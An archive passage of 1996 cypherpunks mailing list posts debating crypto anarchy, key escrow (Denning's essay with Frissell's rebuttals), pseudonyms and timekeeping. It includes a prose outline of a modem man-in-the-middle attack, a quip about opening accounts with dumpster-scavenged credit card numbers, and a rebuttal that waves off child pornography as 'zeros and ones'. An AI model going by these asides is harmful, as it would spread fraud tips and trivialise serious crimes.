>>     http://www.cosc.georgetown.edu/crypto/Future.html
>
>This can be found at
>   http://www.cosc.georgetown.edu/~denning/crypto/Future.html
>
>> One should realize, of course, that whether Crypto Anarchy
>> prevails depends not upon the varied philosophical leanings of
>> citizen-units May and Denning, but rather upon whether our
>> mathematics is more powerful than their jackbooted thugs.
>
>What I found interesting was the lack of meat behind
>"Crypto Anarchy is Not Inevitable".  It seemed to boil
>down to the vacuous "if everyone could just agree that key
>escrow is a good thing, there would be no problem".

This is the main reason I haven't bothered to rebut her points: there were
essentially none to rebut.

(There are substantive criticisms of my points that can be made, including
discussions of what might be done to delay or even head off crypto anarchy
completely. I had dinner a few nights ago with David Friedman, author of
"The Machinery of Freedom," and he made some incisive comments about how
the State might go about heading off this future. I'm glad he's on our
side, and not the government's.)

Two other reasons I have not sought to rebut her analysis:

First, I doubt many people saw either my original article (available on Bob
Hettinga's page: http://thumper.vmeng.com/pub/rah/anarchy.html) or
Denning's reaction article.

Second, I stated my views, she stated her views, not much more to say.
Especially as she has not had an active presence on the Net, either in
talk.politics.crypto or in other forums I have seen, and thus a real debate
on the Net has not been possible.

Mostly I know I can't change her views, so why bother? Other people may
have their views affected by what I say, and for these people I have
certainly written enough.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 08:54:50 +0800
To: cypherpunks@toad.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <ad2e88f01e021004f5ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:56 PM 1/26/96, Alan Olsen wrote:

>More will follow as the demons appear in more and more forms.
>

Just a minor correction, here. You mention "demons."

Under the "C" heading inside the V-chip, C for Christian, any use of such
Satanic-related language must be labelled for filtering by all
right-thinking Christians.

Terms considered to be Satanic-inspired: demon, daemon, sprite, troll,
Goddess, witch, Wicca, Cthulhu, Crowley, and about 73 other words which the
V-chip is programmed to recognize.

(The V-chip had originally been programmed to reject "pixel," but we
convinced them that pixels have nothing to do with pixies, which of course
are on the list of banned words to be filtered.)

--Klaus!

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 27 Jan 1996 08:07:00 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <9601242357.AA02688@alpha>
Message-ID: <9601262105.AA13065@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Peter D. Junger writes:
 > But in one way the case may be worse for you cryptographers if you 
 > actually carry source code--or machine code--around inside your head.
 > ...  So, unless you first erase that portion of your memory that
 > contains the C code for implementing the RSA algorithm ...

No problem.  I can drink myself into a stupor, kill the brain cells,
and then be happily assured that I can just flip open the copy of
Schneier I'll carry openly under my arm and recall the algorithms from
there.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Sat, 27 Jan 1996 09:27:46 +0800
To: tcmay@got.net
Subject: Re: Crippled Notes export encryption
In-Reply-To: <ad2c8470070210049c6c@[205.199.118.202]>
Message-ID: <199601262323.PAA11322@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May says:
> I have several pieces of evidence which suggest to me that the government
> is leaning on companies in ways which are not always apparent. (I can't
> share all of the evidence I have...I know this is unsatisfying. I'm not
> asking you to "trust me," just noting that this is what I have either heard
> from usually reliable sources or from direct participants.)

I just got back from the AFCEA show.  Lotus was there demonstrating
Lotus Notes V4 DMS (Defense Messaging System).  They've hacked it to
be DMS complaint (I think that that means mostly that they support
X.400 addressing, X.500 directory services and use a Fortezza card to
encrypt and sign)...

There are a lots of folks involved in the DMS game.  Loral is the prime
contractor.  ESL, Lotus and Microsoft are providing UA's (front ends).

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 27 Jan 1996 01:17:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
In-Reply-To: <199601260802.DAA08993@thor.cs.umass.edu>
Message-ID: <3108f221.3021701@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996 03:02:56 -0500 (EST), Futplex wrote:

> Has someone here managed to extract PostScript hardcopy of the CAPI from this
> Web page? I tried earlier this evening and wound up with a miniature 
> ecological disaster on my hands. The page says:

No problem on a LaserJet 4M.



> "For ease of online reading and printing, we've provided copies of this
> lengthy document in Microsoft Word and Postscript formats."

I tried printing the Word version from WordView, also, and ran into
major problems.  It absolutely insisted on setting the printer to
manual feed, and when I tried to print the odd-numbered pages,
WordView crashed complletely.

> Worse still, it appears that the
> capiapp.ps file is actually a catenation of many PostScript files (one per
> chapter?), each beginning with a version of this ensnarling line.

Maybe that's why I couldn't extract odd & even-numbered pages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Sat, 27 Jan 1996 08:01:13 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
Message-ID: <Pine.BSD/.3.91.960126150104.16758A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Peter Monta   pmonta@qualcomm.com wrote:
>What I found interesting was the lack of meat behind
>"Crypto Anarchy is Not Inevitable".  It seemed to boil
>down to the vacuous "if everyone could just agree that key
>escrow is a good thing, there would be no problem".

If found this interesting too.  I was waiting for the reason it wasn't
inevitable but it never came.  Denning seems willing to predict a future
where there are no more technical advances in fields like steganography and
dc nets.  

Besides, won't the penalty for communicating using non-government
approved methods be life in prison?  What you are hiding *may* be evidence
of a murder or that you are a drug kingpin.  Unless the penalty is worse 
than that for being convicted of the crime you commited, criminals will use 
non-approved crypto and benefit greatly from it.  

I don't think the public will buy this type of sentencing. Remailer
operators will be sentenced to life once unapproved crypto goes through
their system, even stego.  ISP managers will have to go to jail too if
they let 1 non-government approved message slip though. 

If this is the way it is enforced it will be too easy to set up ISPs and 
remailer operators.  All the big on-line services could be targetted 
too.  You don't like AOL?  Just sign up using one of their handy disks 
and the CC# you just scammed out of a dumpseter.  Don't forget to use a 
payphone! Post non-GAKed crypto messages to usenet from AOL with cool 
subjects like, "Here is where to leave the money." and "#43r5637 to 
#4847d66".  I don't see how enforcement is workable.
 


      Weld Pond   -  weld@l0pht.com        -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 27 Jan 1996 01:34:05 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <m0tffca-00090pC@pacifier.com>
Message-ID: <Pine.HPP.3.91.960126160717.1324B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell wrote:

> While this may be based on the "classic" view of the start of the direct 
> involvement in WWII, I agree with the opinion of an old college professor 
> that the US KNEW that the Japanese were going to attack, SOMEWHERE and 
> SOMEWHEN (but not exactly), and in fact WANTED the attack to occur to 
> justify getting into a war that we "should" have entered.

Alan Horowitz added:

>I've read that FDR had a humint source warning of a Japanese strike on 
>Pearl Harbor. I also recall reading that J Edgar Hoover received a report 
>of a diplomatic conversation detailing the planned attack, but sat on it.

And this is from a post I sent to the list last summer:
***************************************************************
I just read 'Infamy' by John Toland (1982), containing 'proof'
- very convincing, in my opinion - of the Pearl Harbour cover-up.
The US president, selected members of his cabinette and a
few admirals and generals knew - from Magic and the 'winds'
execute, radio traffic analysis, diplomatic sources, double
agents - exactly when and where the Japaneese were going to
attack, but didn't warn Hawaii, fearing that too efficient
counter-measures by the Oahu military might make the attack
abort and so not convince the isolationists. The unexpected 
tactical capabilities of the Japaneese armada then made a
cover-up all the more important.
*****************************************************************

The unfortunate cipher expert Captain Safford spent most of
his post-war life trying to uphold the honour of his fellow
cryptanalysts, putting the blame on generals and politicians,
but in vain.

'Infamy' is an interesting book.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 09:54:19 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Time codes for PCs (fromn German Banking)
Message-ID: <m0tfyb0-00090XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:11 PM 1/24/96 -0500, Dave Emery wrote:
>> 
>> Was the person in the basement eavesdroping or actuall performing a
>> man-in-the-middle attack?
>> 
>	Very much the easiest way of doing this is a classic man in the
>middle attack with two vanilla off the shelf modems and a vanilla off
>the shelf central office simulator.  The modems would be  tied more or
>less back to back through two serial ports and software on a laptop in
>the basement, one modem connected to the actual phone line to the central
>office and the other connected to the local wires to the targets home
>through the central office simulator.  This way all traffic in both
>directions would go through the modems and software on the laptop
>allowing the connection to be taken over cleanly between packets, and
>packets to be injected and deleted as needed.  I beleive that it would
>not be hard to make such a MITM decode the DTMF dialing from the target 
>and dial the same number on its outgoing modem thus enabling the
>MITM to passively relay modem calls it wasn't interested in spoofing.
>And incoming modem calls could be similarly handled.

A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
broadcast to the millisecond/microsecond/nanosecond, available from sources 
as varied as TV VIR's, FM subcarriers, and other sources, available as an 
easy input (via a peripheral card) to a computer.

I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
and had the foresight to install it with its computer  interface option. 
(receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
containing "exact" time.) 

While I've never taken the time to connect it to my PC, it provides 
(through an RS232 jack) correct time with a rated accuracy of about 5 
milliseconds, as I vaguely recall. (Even has a dipswitch setup on the bottom 
to tell it how many 500 mile increments you are away from WWVB... corrects 
for delay to a first order of magnitude.)

(BTW, if anybody knows how to easily connect it to the pc, or has the 
appropriate software, please tell me  The task isn't difficult from a 
hardware standpoint; it's just RS-232 serial ASCII timecode at about 9600
bps which 
either continuously retransmits or on request.  The problem is the software: 
 How, exactly, do I INTERFACE such a serial input to the existing computer/RTC 
combination? (Don't tell me to plug it into an unused serial jack!  I'm not 
stupid. I'm not a  programmer, and I don't play one on TV! (I know 
gates, flops, op amps, A/D, D/A, microprocessor hardware design, even some 
Z-80 assy language, RF,  and I've programmed in Fortran, Basic, APL, Algol, 
PL/1, Pascal, LISP, but not recently and I don't enjoy it!)


(Then again, there are those "Receptor" watches which have (at least) similar 
accuracy, which as I understand it work on FM subcarrier principles.)


Technology has now supplanted this old monstrosity:  Even with CHEAP GPS 
receivers, they put out time which is rated in accuracy to well better than 
1 microsecond, and probably better than 200 nanoseconds even with S/A turned 
on, and probably 100 nanoseconds with S/A off.  Once GPS receivers contain 
equally cheap DGPS receivers, they'll be able to tell you your location to 
about 1 meter and corresponding time accuracy, about 3 nanoseconds.

I'm not particularly familiar with TV VIR signals, but I'd imagine they are 
timecoded, or at least they COULD be without a lot of effort.  Resolution 
would be FAR better than 1 microsecond, and accuracy would be primarily 
limited by knowledge of your location compared to the xmitter.

MITM attacks would be far more difficult if both ends of the data 
conversation agreed on the "exact" time, and could detect transmission 
delays and CHANGES in transmission delays.  While it would be possible to 
locally spoof the accurate timecode, a cheap version of a "disciplined 
oscillator" (which any GPS receiver is going to have, anyway) would detect 
such short-term spoofing trivially.

Occasionally, I've speculated on whether it might be useful to be able to 
synchronize (or, at least, KNOW) to the PHASE of the 60 Hz power grid.  
True, I know that the HV grid is 3-phase and most people won't know which 
phase they're on anyway, but that wouldn't change (at least not frequently!) 
, and I would imagine that 
it might be  useful.  You wouldn't necessarily know which CYCLE you're on, 
either, but again that might be compensated for somehow.  If  your computer 
were talking, locally, to another computer at 4100 baud (? whatever) (7 bits 
per symbol(?); equals 28.8kbps) you could "easily" agree on a particular cycle 
relationship, which is going to be essentially constant over a distance of a 
few tens or even hundreds of miles.

What I DON'T know (and some HV transmission engineer will probably be able 
to tell me, hint hint!) is how STABLE this phase is across the entire 
country?  I realize that this will probably depend on who'se shipping excess 
 power to whom at the moment, But I'd imagine the variability will be 
distinctly limited.

The biggest attraction of such a system is that the interface would probably 
be trivial:  Getting it from the P/S is out because they didn't anticipate 
such a thing.  The easiest interface might be an AC wall xformer with a 
rectifying limiter and slicer  (Okay, maybe just a resistor and a diode, 
possibly with the addition of a comparator for precision), driving a 
readable pin on an otherwise-unused RS-232 interface.  (Possibly 
installed similar to a dongle.)  Appropriate software (yucch!) would read 
the square waves, and record the phase at any one time.  Such information 
could be used to verify the relative synchronization between two different 
computers, although it would be necessary to identify particular phases, as 
I mentioned before.


BTW, if you're read this far, I think it would be appropriate to introduce 
myself, despite the fact that I've already been posting to this area for a 
few weeks.  I'm James Dalton Bell (yes, THOSE Daltons!) and I'm in 
Vancouver, Washington, USA.  I may talk like a EE, but am not; I have formal 
and/or informal backgrounds in Chemistry (BS Chemistry MIT 1980), 
electronics (analog and digital and RF (N7IJS) and uP), physics, and keep an 
eye on numerous other technical fields.

Politically, I'm 120/120 on the Nolan chart (there's some questions they 
left out (that's a joke)) which means I'm a "extremist libertarian."  I'm 
also rather newly anarchistic, and (with all due modesty) rather inventive.  

Current employment?  None. Well, nothing to speak of.  But you'll be hearing 
more about me.

Jim Bell

Klaatu Burada Nikto   Remember this.  It'll become important, soon.

"Something is going to happen.  Something....wonderful!"






 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQlyv/qHVDBboB2dAQHZvQP+IKeO508C7ZTA22DSELjvpWTYa0iGtTcX
U486t+8P0iC9qxq346wzxm9USae4d8NOM9wBKrio095hrKnzAZQE1BETUKCx3BJv
bywqin7Qjb87j6OECJ6S/eAh5t6LXMnDepGdUr7rw+gBxsNg7kzz10/TGh4pXKNu
D5PuGPnTY34=
=r4JO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peer@alpha.c2.org (Peer Gynt)
Date: Sat, 27 Jan 1996 09:45:54 +0800
To: cypherpunks@toad.com
Subject: Re: Nym use in the real world
Message-ID: <199601270035.QAA06231@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>  With the coming Internet restrictions and growing use of the
>  net by LEAs, it's become obvious to me that I shouldn't post
>  messages with my real name.

My reasons for experimenting with nymdom are somewhat different.  I
have no intentions of using my nym for anything that I would not do
using my True Name.  I see it more as a tool for segmenting the
knowledge the outside world has about me.  With the expansion of
information ubiquity and easy access to powerful search tools, nyms
become a welcome tool to foil the dossier builders.

>  1. reputation.  My nym will need to build it's own reputation, I
>  know.  But I currently get offers of work based on my reputation
>  and posts.  I would like this to continue.  When it comes time to
>  do the work and collect the pay, I need to tie my nym to me.

While certainly useful, nyms have very definite practical limits.  I
see them as more useful and flexible once one discards the monolithic
nym concept (ie my name is xxx and my nym is Peer).  When one uses
multiple nyms for multiple purposes, discarding the secrecy of one is
less troublesome.  This also allows the cultivation of positive
reputation in diverse reputation markets.  Of course, doing this to
any great extent may be more trouble than it's worth.

>  2. does it (a nym) really help?  Police and governments are used to
>  dealing with people who change their names, use fake names, etc.  I
>  get the impression that having multiple/fake names is considered by
>  police to be evidence or at least indication of guilt.  "If you're
>  not guilty why're you hiding?".

While there is certainly a stigmata associated with nymdom (even
occasionally on Cypherpunks, of all places), I don't think it will
provide any additional liability (assuming nyms themselves don't
become illegal).  If your nym is investigated and compromised, then
your True Name has already been linked to your actions - they know
you're guilty.  And while using a nym may attract unwanted attention
due to its nature, can it be worse than using your True Name?

Perhaps.  I keep forgetting about selective enforcement...

Peer

Aside: How many people here actually check signatures?  For those who
don't, does seeing a signed message inspire any additional confidence?
For those who do, does seeing an incorrectly signed message inspire
any less confidence?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQlwCKUvpX8WyJyxAQGUuAP/UZXCUbD9iJdmjOb9QGoZ8lD3j22bbeU0
04ucZ81EBMLB0rrOoaCihW7ywvm54/o5uJIw5QN68bkj5ZlM5MqCHn9j7Cowvyb6
VHY+5dhULDpT6GF5CRcxbYmdyYpbl0nHzO8PeaG0oX46+YJTEhDpXoywBxDcjHnP
+YLtJ+7xUx4=
=uesQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 27 Jan 1996 09:13:25 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Nym use in the real world
Message-ID: <v0153050aad2ef1da504f@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 AM 1/26/96, Eric Murray wrote:
>With the coming Internet restrictions and growing use of the
>net by LEAs, it's become obvious to me that I shouldn't post
>messages with my real name.  But I have some problems/questions about
>using a nym:

[...]

Very good points.  Just saying "use anonymity" is often a gross
oversimplification for several reasons.  One of the problems I've been
thinking about recently is that I may want only a special group of people,
and no one else, to know that I'm responsible for a post.  A nym won't work
in this case.

As has been pointed out here before, a lot of people are going to be
getting in trouble for things they posted to obscure newsgroups or mailing
lists four years ago.  How do I make sure that I get credit for something
I've posted, but avoid the Alta Vista police?  There are a few feeble
solutions, like:

h  w  t  w  s  t  c  b  s  f  w  A  V
i  o  h  a  o  h  a  e  e  o  i  l  i
d  r  i  y     e  n     a  r  t  t  s
i  d  s        y  '     r     h  a  t
n  s              t     c           a
g                       h
                        e
                        d

o.r..l.i.k.e..t.h.i.s

...but someone will undoubtedly find a way to search for these things
eventually, or they can just subscribe to the list!

Anonymity is a pain in the ass, frankly, which is why I've never used it.
True, I've never needed to post anything really sensitive, but going
through life as "Black Unicorn" (no offence, BU) is just an unacceptable
inconvenience as far as I'm concerned.  Sort of like having to live on the
lam, which I'm sure is no party.

It seems there are more and more situations where encryption and anonymity
aren't enough.  One obvious case is the web, where I may want to put
something of questionable legality on my home page.  There's no way that
crypto will render the laws irrelevant in this case.  Can I get an offshore
account and post the offending graphic there?  Yes, but it's a pain.  And
when the big net crackdown comes, I wonder whether the U.S. will pressure
other countries to participate and help them wipe out these data and gif
havens?

The net is moving farther and farther away from being a "Temporary
Autonomous Zone," meaning there are fewer and fewer pockets to hide or get
lost in.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Jan 1996 09:17:20 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's Crypto Archy [LONG]
Message-ID: <2.2.32.19960126214239.006ca3fc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


                         The Future of Cryptography

                             Dorothy E. Denning
                            Georgetown University

                            Revised January 6, 1996

               [Responses by Duncan Frissell in square brackets]

Although May limply asserts that anarchy does not mean lawlessness and
social disorder, the absence of government would lead to exactly these
states of chaos. 

[Tim is rarely given to limp assertions.  I haven't seen him spend much time
arguing about the exact social arrangements of a free society following the
crypto revolution.  He has merely pointed out the results of the technology.]

I do not want to live in an anarchistic society -- if such could be called a
society at all -- and I doubt many would. 

[Whatever happens, there will always be plenty of cults around (perhaps even
one called the Government of the United States of America) to which anyone
will be free to belong and at the altars of which one will be free to
worship.  In fact the deregulation of human interaction will make it easier
for more oppressive cults to exist than is possible today as long as they
keep to themselves.  There will be no shortage of people willing to tell
their followers what to do.  Nothing will stop anyone from joining such a
society.]

A growing number of people are attracted to the market liberalism envisioned
by Jefferson, Hayek, and many others, but not to anarchy. Thus, the crypto
anarchists' claims come close to asserting that the technology will take us
to an outcome that most of us would not choose.

[Still up for negotiation is how liberal a market we will want.  The growing
power of markets and (traditional) liberal ideas is the result of the
growing wealth and power of individuals around the world.  Crypto anarchists
merely point out that the shape of future market societies is no longer in
the hands of "The Authorities" but is rather in the hands of those trading
on the market; i.e., everyone on Earth."]

This is the claim that I want to address here. I do not accept crypto
anarchy as the inevitable outcome. A new paradigm of cryptography, key
escrow, is emerging and gaining acceptance in industry.

[That is what remains to be seen.]

The drawbacks of cryptography are frequently overlooked as well. The
widespread availability of unbreakable encryption coupled with anonymous
services could lead to a situation where practically all communications are
immune from lawful interception (wiretaps)

[My thoughts are immune from 'lawful interception' as are everyone else's
and yet the world survives.  Thought is communication within the brain.
Communication is 'thought' between brains.  The world which has survived
private thoughts can survive private communications.  The whole concept of
controlling communications is a bit obsolete in any case.  In past eras, the
only social threat came from large masses of men (hence the desire to
intercept and control communications) whereas today any individual can do
more damage than a large group in the past.]

and documents from lawful search and seizure, and where all electronic
transactions are beyond the reach of any government regulation or oversight.
The consequences of this to public safety and social and economic stability
could be devastating. 

[See the recent joint study by the Cato Institute, the Fraser Institute, and
9 other think tanks world wide showing that there is a strong positive
correlation between nations with free economies and nations with wealth.
There seems little doubt that total economic deregulation is a good thing.
We shall certainly have the chance to test that hypothesis in coming years.
I haven't seen any nation harmed so far by having too free an economy.]

With the government essentially locked out, computers and telecommunications
systems would become safe havens for criminal activity. Even May himself
acknowledges that crypto anarchy provides a means for tax evasion, money
laundering, espionage (with digital dead drops), 

[That is, keeping your own money, transferring funds, and research.  Sounds
like activities that should not be the concern of others.]

contract killings,

[These may be easier although *government* killings will be harder since
governments may lack the resources to do as much of that sort of thing as
they have done before.  (From 1917-1989, Communist governments murdered
someone every 30 seconds -- a total of some 60 million people.)  In
addition, those who fear they may be the subject of contract killings can
use pseudonyms, locational ambiguity, and untraceable communications to make
themselves harder to find and thus to kill.]

and implementation of data havens for storing and marketing illegal or
controversial material. 

[Last time I looked, controversial material was legal to possess and
transmit.  Illegal information will no longer be illegal if its transmission
can't be stopped since utterly unenforceable laws tend to go away (see
Sodomy).] 

Encryption also threatens national security by interfering with foreign
intelligence operations. The United States, along with many other countries,
imposes export controls on encryption technology to lessen this threat.

[Of course if the US is weakened by the growth of (really) free markets, its
enemies will be as well so foreign threats will automatically diminish.] 

Cryptography poses a threat to organizations and individuals too. With
encryption, an employee of a company can sell proprietary electronic
information to a competitor without the need to photocopy and handle
physical documents.

[This is a threat from digitization, not from encryption.]

The keys that unlock a corporation's files may be lost, corrupted, or held
hostage for ransom, thus rendering valuable information inaccessible. 

[Or the computers can not be backed up, can crash, can be blown up, can be
flooded, can experience disk failures, etc.  This is not a problem unique to
encryption.  Backups and scattered sites are always necessary.  High-speed
networks, secure communications, and encryption make it easier to back up
your systems at different locations all over the world.  They help you avoid
data loss, they don't contribute to it.  Key splitting and private key
escrow can easily protect keys.]

When considering the threats posed by cryptography, it is important to
recognize that only the use of encryption for confidentiality, including
anonymity, presents a problem. 

[Of course confidentiality is the reason codes were invented in the first
place.  Additionally, the Supreme court has recognized that anonymity has
First Amendment protection.  We have already made the social decision that
anonymity is OK in many circumstances.  I'm sure that all of us engage in
many anonymous transactions on a daily basis and yet the world survives.]

Crypto anarchy can be viewed as the proliferation of cryptography that
provides the benefits of confidentiality protection but does nothing about
its harms. It is government-proof encryption which denies access to the
government even under a court order or other legal order.

[In countries that don't regularly practice torture, we have the power to
disobey court orders in any case.  Modern technology merely makes it easier
and reduces the likelihood of punishment.  Court orders are rare in any
case.  Seems like much ado about nothing.]  

It has no safeguards to protect users and their organizations from accidents
and abuse.

[This is the job of those who write software, not philosophers.]

The crypto anarchist position is that cyberspace is on a non-stop drift
toward crypto anarchy.

[I usually argue that the spread of markets is driven more by cheap telecoms
and the growth of a very efficient market infrastructure.  Cryptography
hasn't had much of an impact yet.  I think that even without crypto, markets
will swamp attempts to regulate them and since people can move as well, they
are becoming harder to control even before any crypto revolution.]

In addition to the free encryption programs being distributed on the net,
encryption is becoming a basic service integrated into commercial
applications packages and network products. The IP Security Working Group of
the Internet Engineering Task Force has written a document that calls for
all compliant IPv6 (Internet Protocol, version 6) implementations to
incorporate DES cryptography.

[The net belongs to its customers and as owners they will probably decide to
secure their property.  Sounds enormously democratic to me.]

The potential harms of cryptography have already begun to appear. As the
result of interviews I conducted in May, 1995, I found numerous cases where
investigative agencies had encountered encrypted communications and computer
files. These cases involved child pornography, 

[Possession of a bunch of zeros and ones.]

customs violations

[free trade]

drugs

[the retail pharmaceutical trade]

espionage

[research]

embezzlement

[finally a crime]

murder

[Another crime.  Can you give us the details of a murder investigation
blocked by cryptography?  We don't need any names.]

obstruction of justice

[Refusal to make things easy for prosecutors.  A *real* crime.  This wasn't
Hillary by any chance, was it?]

tax protesters

[You mean tax evaders, don't you?  Far as I know, protesting taxes is a
legal activity.]

and terrorism.

[State-sponsored or private?]

At the International Cryptography Institute held in Washington in September,
1995, FBI Director Louis Freeh reported that encryption had been encountered
in a terrorism investigation in the Philippines involving an alleged plot to
assassinate Pope John Paul II and bomb a U.S. airliner [4].

[But the perp was caught anyway.  Is this the same Louis Freeh who thinks
that the loss (by him) of a government cellphone is just as bad as the FBI
issuing shoot-to-kill orders against American citizens before even trying to
arrest them (since he punished both with a letter of reprimand)?]

AccessData Corp., a company in Orem, Utah which specializes in providing
software and services to help law enforcement agencies and companies recover
data that has been locked out through encryption, reports receiving about a
dozen and a half calls a day from companies with inaccessible data.

[Sounds like poor system design.  I'm not sure that advising others how to
safely store their business records has anything to do with law enforcement,
however.]

The idea is to combine strong encryption with an emergency decryption
capability. This is accomplished by linking encrypted data to a data
recovery key which facilitates decryption. This key need not be (and
typically is not) the one used for normal decryption, but it must provide
access to that key. The data recovery key is held by a trusted fiduciary,
which could conceivably be a governmental agency, court, or trusted and
bonded private organization. A key might be split among several such agencies. 

[Why would a government agency or a court be the best entity to provide
business services?  If I'm looking for someone to install a LAN in my
office, I don't immediately think to call the Post Office and get them to
bid on the job.  Business services like data backup and recovery are much
more likely to be efficiently accomplished by a private contractor.] 

Organizations registered with an escrow agent can acquire their own keys for
emergency
decryption. An investigative or intelligence agency seeking access to
communications or stored files makes application through appropriate
procedures (which normally includes getting a court order) and, upon
compliance, is issued the key. 

[But what if it turns out that my chosen escrow agent is located outside the
jurisdiction of the court.  Surely you don't want to cause any NAFTA or GATT
problems here.  The WTO might declare your encryption policy to be an unfair
trade practice.]  

Legitimate privacy interests are protected through access procedures,
auditing, and other safeguards.

[But what if some of us want better protection than bureaucratic promises
and procedures.  Some people in the past who relied on government promises
and procedures ended up in crowded "shower" rooms trying to extract oxygen
from diesel exhaust.].

In April, 1993, as response to a rising need for and use of encryption
products, the Clinton Administration announced a new initiative to promote
encryption in a way that would not prohibit lawful decryption when
investigative agencies are authorized to intercept communications or search
computer files [6].

[And a rousing success it was.]

The IBAG principles acknowledge the right of businesses and individuals to
protect their information and the right of law-abiding governments to
intercept and lawfully seize information when there is no practical
alternative. 

[Is a communist dictatorship a "law abiding government?"]

The principles call for industry to develop open voluntary, consensus,
international standards and for governments, businesses, and individuals to
work together to define the requirements for those standards. The standards
would allow choices about algorithm, mode of operation, key length, and
implementation in hardware or software. Products conforming to the standards
would not be subject to restrictions on import or use and would be generally
exportable.

[Gee, I thought that was what we were doing.]

It is conceivable that domestic and international efforts will be sufficient
to avoid crypto anarchy, particularly with support from the international
business community. However, it is possible that they will not be enough.
Many companies are developing products with strong encryption that do not
accommodate government access, standards groups are adopting non-key escrow
standards, and software encryption packages such as PGP are rapidly
proliferating on the Internet, which is due, in part, to the crypto
anarchists whose goal is to lock out the government.  Since key escrow adds
to the development and operation costs of encryption products, the price
advantage of unescrowed encryption products could also be a factor which
might undermine the success of a completely voluntary approach.

[Sounds like the voluntary cooperation of human beings in international
markets is just humming right along isn't it?  It seems that a lot of market
participants are "voting with their feet" for strong crypto.  The System is
the Solution.]

Under this licensing program, commercial encryption products, including
programs distributed through public network servers, would comply with
government regulations. 

[Isn't a "public network server" just a server that is made world readable?
Since there will be (conservatively) 100 million "public network servers"
online in a few years, won't enforcement be a trifle difficult?]

Such an approach would not prevent the use of government-proof encryption
products by criminals and terrorists.  They could develop their own or
acquire the products illegally. But an approach of this type would make it
considerably more difficult than it is at present. Had such controls been
adopted several years ago -- before programs such as DES and PGP were posted
on the Internet -- the encryption products on the market today would support
key escrow or some other method for government access.

[As I recall, wasn't public key encryption developed in spite of the fact
that the NSA had in place an unofficial ban on cryptographic research?  The
NSA's ban failed.  Since you are not proposing outlawing such research, what
makes you think that mere distribution controls will work? ]

It would not be possible to acquire strong, government-proof encryption from
